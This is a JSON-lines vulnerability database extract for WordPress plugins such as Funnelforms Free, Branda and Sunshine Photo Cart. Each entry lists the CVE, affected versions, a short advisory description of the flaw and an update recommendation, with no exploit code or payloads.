{"CVE_ID":"CVE-2023-5411","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_af2_save_post function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to modify certain post values. Note that the extent of modification is limited due to fixed values passed to the wp_update_post function.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/816f5fc1-e4e6-4c0d-b222-fe733f026e33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/816f5fc1-e4e6-4c0d-b222-fe733f026e33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5387","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_af2_trigger_dark_mode function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to enable or disable the dark mode plugin setting.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccb34b44-9fa4-4ebe-b217-b2a42920247f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccb34b44-9fa4-4ebe-b217-b2a42920247f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5386","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_delete_posts function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts, including administrator posts, and posts not related to the Funnelforms Free plugin.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/400fe58b-8203-4fd5-a3d3-d30eb1b8cd85?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/400fe58b-8203-4fd5-a3d3-d30eb1b8cd85?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5385","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsf_copy_posts function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to create copies of arbitrary posts.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2719afc-e52c-4fcc-b030-2f6aaddb5ab9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2719afc-e52c-4fcc-b030-2f6aaddb5ab9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5383","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4. This is due to missing or incorrect nonce validation on the fnsf_copy_posts function. This makes it possible for unauthenticated attackers to create copies of arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ec0f0-fa7a-4531-b5f7-5adcf2af051c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ec0f0-fa7a-4531-b5f7-5adcf2af051c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5382","slug":"funnelforms-free","versionImpact":"3.4","versionEndExcluding":"3.4.2","description":"The Funnelforms Free plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4. This is due to missing or incorrect nonce validation on the fnsf_delete_posts function. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72e4428b-d2cd-471f-9821-947f4601fd64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72e4428b-d2cd-471f-9821-947f4601fd64?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2986938\\\/funnelforms-free\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6554","slug":"branda-white-labeling","versionImpact":"3.4.18","versionEndExcluding":"3.4.19","description":"The Branda \u2013 White Label WordPress, Custom Login Page Customizer plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.4.18. This is due the plugin utilizing composer without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.4.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a79eb25-a7d1-4102-97e6-8fa8db9ed03e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a79eb25-a7d1-4102-97e6-8fa8db9ed03e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/trunk\\\/misc\\\/composer\\\/prefix-fixer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/trunk\\\/misc\\\/composer\\\/prefix-fixer.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115603%40branda-white-labeling&new=3115603%40branda-white-labeling&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3115603%40branda-white-labeling&new=3115603%40branda-white-labeling&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5191","slug":"branda-white-labeling","versionImpact":"3.4.17","versionEndExcluding":"3.4.18","description":"The Branda \u2013 White Label WordPress, Custom Login Page Customizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018mime_types\u2019 parameter in all versions up to, and including, 3.4.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f4bad5-3a11-42c6-a336-6bd178ab5113?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f4bad5-3a11-42c6-a336-6bd178ab5113?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/tags\\\/3.4.17\\\/inc\\\/modules\\\/utilities\\\/images.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/tags\\\/3.4.17\\\/inc\\\/modules\\\/utilities\\\/images.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104910\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3104910\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5482","slug":"sunshine-photo-cart","versionImpact":"3.4.11","versionEndExcluding":"3.4.12","description":"The Sunshine Photo Cart: Free Client Photo Galleries for Photographers plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.11. This is due to the plugin not properly validating a user-supplied key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's passwords through the password reset functionality, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"Update to version 3.4.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sunshine-photo-cart\\\/trunk\\\/includes\\\/functions\\\/account.php#L303\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sunshine-photo-cart\\\/trunk\\\/includes\\\/functions\\\/account.php#L303\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3305406%40sunshine-photo-cart%2Ftrunk&old=3261773%40sunshine-photo-cart%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3305406%40sunshine-photo-cart%2Ftrunk&old=3261773%40sunshine-photo-cart%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5311b43c-14dd-4bdd-b6d0-d6468b831968?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5311b43c-14dd-4bdd-b6d0-d6468b831968?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1291","slug":"kadence-blocks","versionImpact":"3.4.9","versionEndExcluding":"3.4.10","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018icon\u2019 parameter in all versions up to, and including, 3.4.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246675\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246675\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9df00907-c95e-445c-b424-78a1e5e00e4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9df00907-c95e-445c-b424-78a1e5e00e4f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2640","slug":"watu","versionImpact":"3.4.1.1","versionEndExcluding":"3.4.1.2","description":"The Watu Quiz WordPress plugin before 3.4.1.2 does not sanitise and escape some of its settings, which could allow users such as authors (if they've been authorized by admins) to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","recommendation":"Update to version 3.4.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d46db635-9d84-4268-a789-406a0db4cccf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d46db635-9d84-4268-a789-406a0db4cccf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37391","slug":"wordpress-mobile-pack","versionEndExcluding":"3.4.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in WPMobilePack.Com WordPress Mobile Pack \u2013 Mobile Plugin for Progressive Web Apps & Hybrid Mobile Apps plugin <=\u00a03.4.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-mobile-pack\\\/wordpress-wordpress-mobile-pack-plugin-3-4-1-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-mobile-pack\\\/wordpress-wordpress-mobile-pack-plugin-3-4-1-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45105","slug":"affiliate-toolkit-starter","versionEndExcluding":"3.4.0","description":"URL Redirection to Untrusted Site ('Open Redirect') vulnerability in SERVIT Software Solutions affiliate-toolkit \u2013 WordPress Affiliate Plugin.This issue affects affiliate-toolkit \u2013 WordPress Affiliate Plugin: from n\/a through 3.3.9.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/affiliate-toolkit-starter\\\/wordpress-affiliate-toolkit-wordpress-affiliate-plugin-plugin-3-3-9-open-redirection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/affiliate-toolkit-starter\\\/wordpress-affiliate-toolkit-wordpress-affiliate-plugin-plugin-3-3-9-open-redirection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10878","slug":"sugar-calendar-lite","versionImpact":"3.3.0","versionEndExcluding":"3.4.0","description":"The Sugar Calendar \u2013 Simple Event Management plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.3.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sugar-calendar-lite\\\/tags\\\/3.3.0\\\/includes\\\/common\\\/Features\\\/EventTicketing\\\/includes\\\/admin\\\/orders-list-table.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sugar-calendar-lite\\\/tags\\\/3.3.0\\\/includes\\\/common\\\/Features\\\/EventTicketing\\\/includes\\\/admin\\\/orders-list-table.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188760\\\/sugar-calendar-lite\\\/trunk\\\/includes\\\/common\\\/Features\\\/EventTicketing\\\/includes\\\/admin\\\/orders-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188760\\\/sugar-calendar-lite\\\/trunk\\\/includes\\\/common\\\/Features\\\/EventTicketing\\\/includes\\\/admin\\\/orders-list-table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b06cb3cf-e2da-4e18-9a09-c30cebddf5c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b06cb3cf-e2da-4e18-9a09-c30cebddf5c2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3268","slug":"youtube-showcase","versionImpact":"3.3.6","versionEndExcluding":"3.4.0","description":"The YouTube Video Gallery by YouTube Showcase \u2013 Video Gallery Plugin for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the emd_form_builder_lite_submit_form function in all versions up to, and including, 3.3.6. This makes it possible for unauthenticated attackers to create arbitrary posts or pages.","recommendation":"Update to version 3.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9d5382-d37d-4a40-8f22-e32b8ee98859?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9d5382-d37d-4a40-8f22-e32b8ee98859?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088363\\\/youtube-showcase\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088363\\\/youtube-showcase\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5192","slug":"funnel-builder","versionImpact":"3.3.1","versionEndExcluding":"3.4.0","description":"The Funnel Builder for WordPress by FunnelKit \u2013 Customize WooCommerce Checkout Pages, Create Sales Funnels, Order Bumps & One Click Upsells plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018mimes\u2019 parameter in all versions up to, and including, 3.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b77703e-b3d3-4105-a162-0afe86d5b3eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b77703e-b3d3-4105-a162-0afe86d5b3eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/tags\\\/3.3.1\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-common.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/tags\\\/3.3.1\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-common.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/trunk\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-common-helper.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/trunk\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-common-helper.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107500\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107500\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10693","slug":"skt-addons-for-elementor","versionImpact":"3.3","versionEndExcluding":"3.4","description":"The SKT Addons for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.3 via the Unfold widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8accf552-f235-46dd-857b-330eef7765a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8accf552-f235-46dd-857b-330eef7765a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3183804%40skt-addons-for-elementor&new=3183804%40skt-addons-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3183804%40skt-addons-for-elementor&new=3183804%40skt-addons-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7599","slug":"advanced-sermons","versionImpact":"3.3","versionEndExcluding":"3.4","description":"The Advanced Sermons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018sermon_video_embed\u2019 parameter in all versions up to, and including, 3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41859e1c-1ae0-49f1-82d3-5af3c15994ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41859e1c-1ae0-49f1-82d3-5af3c15994ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/admin\\\/meta\\\/sermon-details.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/admin\\\/meta\\\/sermon-details.php#L396\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/include\\\/templates\\\/sections\\\/video-template.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/include\\\/templates\\\/sections\\\/video-template.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/include\\\/templates\\\/sections\\\/video-template.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-sermons\\\/trunk\\\/include\\\/templates\\\/sections\\\/video-template.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147283\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147283\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0625","slug":"wpfront-notification-bar","versionImpact":"3.3.2","versionEndExcluding":"3.4","description":"The WPFront Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018wpfront-notification-bar-options[custom_class]\u2019 parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-notification-bar\\\/trunk\\\/templates\\\/template-wpfront-notification-bar.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpfront-notification-bar\\\/trunk\\\/templates\\\/template-wpfront-notification-bar.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2500","slug":"go_pricing","versionEndExcluding":"3.4","description":"The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 3.3.19 via deserialization of untrusted input from the 'go_pricing' shortcode 'data' parameter. This allows authenticated attackers, with subscriber-level permissions and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/go-pricing-wordpress-responsive-pricing-tables\\\/3725820\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7686b11-97a8-4f09-bbfa-d77120cc35b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7686b11-97a8-4f09-bbfa-d77120cc35b7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4950","slug":"funnelforms-free","versionEndExcluding":"3.4","description":"The Interactive Contact Form and Multi Step Form Builder WordPress plugin before 3.4 does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73db1ee8-06a2-41b6-b287-44e25f5f2e58\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73db1ee8-06a2-41b6-b287-44e25f5f2e58\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6994","slug":"reveal-listing","versionImpact":"3.3","versionEndExcluding":"3.4","description":"The Reveal Listing plugin by smartdatasoft for WordPress is vulnerable to privilege escalation in versions up to, and including, 3.3. This is due to the plugin allowing users who are registering new accounts to set their own role or by supplying 'listing_user_role' field. This makes it possible for unauthenticated attackers to gain elevated privileges by creating an account with the administrator role.","recommendation":"Update to version 3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reveal-directory-listing-wordpress-theme\\\/27704330\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/reveal-directory-listing-wordpress-theme\\\/27704330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd00d716-535c-41eb-a766-82079e0060e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd00d716-535c-41eb-a766-82079e0060e6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4790","slug":"wp-google-my-business-auto-publish","versionEndExcluding":"3.4","description":"The WP Google My Business Auto Publish WordPress plugin before 3.4 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c01f9d36-955d-432c-8a09-ea9ee750f1a1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c01f9d36-955d-432c-8a09-ea9ee750f1a1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
